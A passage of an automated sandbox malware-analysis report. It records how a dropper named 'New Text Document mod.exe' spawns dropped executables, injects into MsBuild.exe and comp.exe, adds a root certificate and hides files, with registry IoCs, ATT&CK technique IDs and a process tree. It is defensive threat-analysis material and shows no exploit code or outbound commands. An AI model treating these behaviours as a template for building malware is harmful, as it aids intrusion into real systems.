Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-127 = "OpenDocument Text"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xht	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-172 = "Microsoft PowerPoint 97-2003 Slide Show"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-116 = "Microsoft Excel Template"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9934 = "AVCHD Video"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9923 = "Windows Media playlist"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-24585 = "Cascading Style Sheet Document"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{487BA7B8-4DB0-465F-B122-C74A445A095D} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000fe6f19a728acda01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{5985FC23-2588-4D9A-B38B-7E7AFFAB3155} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000bdeab2a628acda01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-107 = "Microsoft Excel Comma Separated Values File"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-111 = "Microsoft Excel Macro-Enabled Template"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-182 = "Microsoft PowerPoint Template"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xht\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-4 = "Microsoft Simplified Chinese to Traditional Chinese Transliteration"	SearchIndexer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wvx\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-913 = "MHTML Document"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\MPEG2Demultiplexer	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-6 = "Microsoft Cyrillic to Latin Transliteration"	SearchIndexer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.DVR-MS\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-915 = "XHTML Document"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{A38B883C-1682-497E-97B0-0A3A9E801682} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000c2767ea628acda01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-178 = "OpenDocument Presentation"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9902 = "Movie Clip"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-131 = "Rich Text Format"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-2 = "Microsoft Script Detection"	SearchIndexer.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\Windows.UI.Immersive.dll,-38304 = "Public Account Pictures"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81B1B56-7613-4EE4-BC05-1FAB5DE5C07E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000004a11baa628acda01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SBE	SearchFilterHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1E589E9D-8A8D-46D9-A2F9-E6D4F8161EE9} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000f724cda628acda01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	SearchFilterHost.exe

Modifies registry class 2 IoCs

Processes:

output.exePirate_24S.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings	output.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings	Pirate_24S.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

eagleget-2-1-6-50.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	eagleget-2-1-6-50.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	eagleget-2-1-6-50.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	eagleget-2-1-6-50.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

7108 PING.EXE

pid	process
7108	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Setup.exewin1.exeMsBuild.execomp.exeoutput.exeAcroRd32.exeFUT.au3svcshost.exepowershell.exepowershell.exeprint.exeupdater.exe

pid	process
6532	Setup.exe
6532	Setup.exe
6532	Setup.exe
4392	win1.exe
4392	win1.exe
4392	win1.exe
4392	win1.exe
4392	win1.exe
6520	MsBuild.exe
6520	MsBuild.exe
5964	comp.exe
5964	comp.exe
5964	comp.exe
5964	comp.exe
2360	output.exe
2360	output.exe
6732	AcroRd32.exe
6732	AcroRd32.exe
6732	AcroRd32.exe
6732	AcroRd32.exe
6732	AcroRd32.exe
6732	AcroRd32.exe
6732	AcroRd32.exe
6732	AcroRd32.exe
6732	AcroRd32.exe
6732	AcroRd32.exe
6732	AcroRd32.exe
6732	AcroRd32.exe
6732	AcroRd32.exe
6732	AcroRd32.exe
6732	AcroRd32.exe
6732	AcroRd32.exe
6732	AcroRd32.exe
6732	AcroRd32.exe
6732	AcroRd32.exe
6732	AcroRd32.exe
5608	FUT.au3
5608	FUT.au3
3272	svcshost.exe
3272	svcshost.exe
5560	powershell.exe
5560	powershell.exe
5560	powershell.exe
7488	powershell.exe
7488	powershell.exe
7488	powershell.exe
3272	svcshost.exe
3272	svcshost.exe
3272	svcshost.exe
3272	svcshost.exe
3272	svcshost.exe
3272	svcshost.exe
3272	svcshost.exe
7136	print.exe
7136	print.exe
7136	print.exe
7136	print.exe
7136	print.exe
7136	print.exe
7136	print.exe
7136	print.exe
7184	updater.exe
7184	updater.exe
7184	updater.exe

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

Setup.execomp.exe

pid process

6532 Setup.exe
5964 comp.exe
Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

syslmgrsvc.exe

pid process

7484 syslmgrsvc.exe

pid	process
7484	syslmgrsvc.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

New Text Document mod.exeAntiVirus2.exesvchost.exeMsBuild.exewin1.exealabi.execsc.exetakeown.exeSearchIndexer.exe7z.exe7z.exe7z.exesvcshost.exepowershell.exepowershell.exetaskkill.exe7z.exe7z.exe

description	pid	process
Token: SeDebugPrivilege	1388	New Text Document mod.exe
Token: SeDebugPrivilege	4304	AntiVirus2.exe
Token: SeDebugPrivilege	6100	svchost.exe
Token: SeDebugPrivilege	6520	MsBuild.exe
Token: SeBackupPrivilege	6520	MsBuild.exe
Token: SeSecurityPrivilege	6520	MsBuild.exe
Token: SeSecurityPrivilege	6520	MsBuild.exe
Token: SeSecurityPrivilege	6520	MsBuild.exe
Token: SeSecurityPrivilege	6520	MsBuild.exe
Token: SeDebugPrivilege	4392	win1.exe
Token: SeDebugPrivilege	6100	svchost.exe
Token: SeDebugPrivilege	6476	alabi.exe
Token: SeDebugPrivilege	6928	csc.exe
Token: SeTakeOwnershipPrivilege	6332	takeown.exe
Token: 33	756	SearchIndexer.exe
Token: SeIncBasePriorityPrivilege	756	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	756	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	756	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	756	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	756	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	756	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	756	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	756	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	756	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	756	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	756	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	756	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	756	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	756	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	756	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	756	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	756	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	756	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	756	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	756	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	756	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	756	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	756	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	756	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	756	SearchIndexer.exe
Token: SeRestorePrivilege	5136	7z.exe
Token: 35	5136	7z.exe
Token: SeSecurityPrivilege	5136	7z.exe
Token: SeSecurityPrivilege	5136	7z.exe
Token: SeRestorePrivilege	6800	7z.exe
Token: 35	6800	7z.exe
Token: SeSecurityPrivilege	6800	7z.exe
Token: SeSecurityPrivilege	6800	7z.exe
Token: SeRestorePrivilege	6668	7z.exe
Token: 35	6668	7z.exe
Token: SeSecurityPrivilege	6668	7z.exe
Token: SeSecurityPrivilege	6668	7z.exe
Token: SeDebugPrivilege	3272	svcshost.exe
Token: SeDebugPrivilege	5560	powershell.exe
Token: SeDebugPrivilege	7488	powershell.exe
Token: SeDebugPrivilege	7048	taskkill.exe
Token: SeRestorePrivilege	2556	7z.exe
Token: 35	2556	7z.exe
Token: SeSecurityPrivilege	2556	7z.exe
Token: SeSecurityPrivilege	2556	7z.exe
Token: SeRestorePrivilege	7756	7z.exe
Token: 35	7756	7z.exe
Token: SeSecurityPrivilege	7756	7z.exe
Token: SeSecurityPrivilege	7756	7z.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

AcroRd32.execrt.tmpClient.exe

pid process

6732 AcroRd32.exe
6896 crt.tmp
1680 Client.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

Client.exe

pid process

1680 Client.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

win1.exeAcroRd32.exe

pid process

4392 win1.exe
6732 AcroRd32.exe
6732 AcroRd32.exe
6732 AcroRd32.exe
6732 AcroRd32.exe
6732 AcroRd32.exe

pid	process
6732	AcroRd32.exe
6896	crt.tmp
1680	Client.exe

pid	process
1680	Client.exe

pid	process
4392	win1.exe
6732	AcroRd32.exe
6732	AcroRd32.exe
6732	AcroRd32.exe
6732	AcroRd32.exe
6732	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

New Text Document mod.exexin.exeSetup.exeoutput.execrt.execomp.exeAcroRd32.execrt.tmpRdrCEF.exe

description	pid	process	target process
PID 1388 wrote to memory of 4436	1388	New Text Document mod.exe	xin.exe
PID 1388 wrote to memory of 4436	1388	New Text Document mod.exe	xin.exe
PID 1388 wrote to memory of 4436	1388	New Text Document mod.exe	xin.exe
PID 1388 wrote to memory of 3256	1388	New Text Document mod.exe	eagleget-2-1-6-50.exe
PID 1388 wrote to memory of 3256	1388	New Text Document mod.exe	eagleget-2-1-6-50.exe
PID 1388 wrote to memory of 4304	1388	New Text Document mod.exe	AntiVirus2.exe
PID 1388 wrote to memory of 4304	1388	New Text Document mod.exe	AntiVirus2.exe
PID 1388 wrote to memory of 4304	1388	New Text Document mod.exe	AntiVirus2.exe
PID 4436 wrote to memory of 6520	4436	xin.exe	MsBuild.exe
PID 4436 wrote to memory of 6520	4436	xin.exe	MsBuild.exe
PID 4436 wrote to memory of 6520	4436	xin.exe	MsBuild.exe
PID 4436 wrote to memory of 6520	4436	xin.exe	MsBuild.exe
PID 4436 wrote to memory of 6520	4436	xin.exe	MsBuild.exe
PID 4436 wrote to memory of 6520	4436	xin.exe	MsBuild.exe
PID 4436 wrote to memory of 6520	4436	xin.exe	MsBuild.exe
PID 4436 wrote to memory of 6520	4436	xin.exe	MsBuild.exe
PID 1388 wrote to memory of 6532	1388	New Text Document mod.exe	Setup.exe
PID 1388 wrote to memory of 6532	1388	New Text Document mod.exe	Setup.exe
PID 1388 wrote to memory of 6532	1388	New Text Document mod.exe	Setup.exe
PID 1388 wrote to memory of 6100	1388	New Text Document mod.exe	svchost.exe
PID 1388 wrote to memory of 6100	1388	New Text Document mod.exe	svchost.exe
PID 1388 wrote to memory of 4392	1388	New Text Document mod.exe	win1.exe
PID 1388 wrote to memory of 4392	1388	New Text Document mod.exe	win1.exe
PID 6532 wrote to memory of 5964	6532	Setup.exe	comp.exe
PID 6532 wrote to memory of 5964	6532	Setup.exe	comp.exe
PID 6532 wrote to memory of 5964	6532	Setup.exe	comp.exe
PID 6532 wrote to memory of 5964	6532	Setup.exe	comp.exe
PID 1388 wrote to memory of 2360	1388	New Text Document mod.exe	output.exe
PID 1388 wrote to memory of 2360	1388	New Text Document mod.exe	output.exe
PID 1388 wrote to memory of 2360	1388	New Text Document mod.exe	output.exe
PID 2360 wrote to memory of 6732	2360	output.exe	AcroRd32.exe
PID 2360 wrote to memory of 6732	2360	output.exe	AcroRd32.exe
PID 2360 wrote to memory of 6732	2360	output.exe	AcroRd32.exe
PID 2360 wrote to memory of 5488	2360	output.exe	SIG.EXE
PID 2360 wrote to memory of 5488	2360	output.exe	SIG.EXE
PID 2360 wrote to memory of 5488	2360	output.exe	SIG.EXE
PID 1388 wrote to memory of 6476	1388	New Text Document mod.exe	alabi.exe
PID 1388 wrote to memory of 6476	1388	New Text Document mod.exe	alabi.exe
PID 1388 wrote to memory of 6476	1388	New Text Document mod.exe	alabi.exe
PID 1388 wrote to memory of 5168	1388	New Text Document mod.exe	crt.exe
PID 1388 wrote to memory of 5168	1388	New Text Document mod.exe	crt.exe
PID 1388 wrote to memory of 5168	1388	New Text Document mod.exe	crt.exe
PID 5168 wrote to memory of 6896	5168	crt.exe	crt.tmp
PID 5168 wrote to memory of 6896	5168	crt.exe	crt.tmp
PID 5168 wrote to memory of 6896	5168	crt.exe	crt.tmp
PID 5964 wrote to memory of 5608	5964	comp.exe	FUT.au3
PID 5964 wrote to memory of 5608	5964	comp.exe	FUT.au3
PID 5964 wrote to memory of 5608	5964	comp.exe	FUT.au3
PID 6732 wrote to memory of 5556	6732	AcroRd32.exe	RdrCEF.exe
PID 6732 wrote to memory of 5556	6732	AcroRd32.exe	RdrCEF.exe
PID 6732 wrote to memory of 5556	6732	AcroRd32.exe	RdrCEF.exe
PID 6896 wrote to memory of 5500	6896	crt.tmp	soundermidiplayer.exe
PID 6896 wrote to memory of 5500	6896	crt.tmp	soundermidiplayer.exe
PID 6896 wrote to memory of 5500	6896	crt.tmp	soundermidiplayer.exe
PID 6896 wrote to memory of 3456	6896	crt.tmp	soundermidiplayer.exe
PID 6896 wrote to memory of 3456	6896	crt.tmp	soundermidiplayer.exe
PID 6896 wrote to memory of 3456	6896	crt.tmp	soundermidiplayer.exe
PID 5964 wrote to memory of 5608	5964	comp.exe	FUT.au3
PID 5964 wrote to memory of 5608	5964	comp.exe	FUT.au3
PID 6732 wrote to memory of 7092	6732	AcroRd32.exe	RdrCEF.exe
PID 6732 wrote to memory of 7092	6732	AcroRd32.exe	RdrCEF.exe
PID 6732 wrote to memory of 7092	6732	AcroRd32.exe	RdrCEF.exe
PID 5556 wrote to memory of 7324	5556	RdrCEF.exe	RdrCEF.exe
PID 5556 wrote to memory of 7324	5556	RdrCEF.exe	RdrCEF.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

1804 attrib.exe
7580 attrib.exe

pid	process
1804	attrib.exe
7580	attrib.exe

C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1388

C:\Users\Admin\AppData\Local\Temp\a\xin.exe
"C:\Users\Admin\AppData\Local\Temp\a\xin.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4436

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 252
3⤵
- Program crash
PID:5324

C:\Users\Admin\AppData\Local\Temp\a\eagleget-2-1-6-50.exe
"C:\Users\Admin\AppData\Local\Temp\a\eagleget-2-1-6-50.exe"
2⤵
- Executes dropped EXE
- Modifies system certificate store
PID:3256

C:\Users\Admin\AppData\Local\Temp\a\AntiVirus2.exe
"C:\Users\Admin\AppData\Local\Temp\a\AntiVirus2.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4304

C:\Users\Admin\AppData\Local\Temp\a\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:6532

C:\Windows\SysWOW64\comp.exe
C:\Windows\SysWOW64\comp.exe
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:5964

C:\Users\Admin\AppData\Local\Temp\FUT.au3
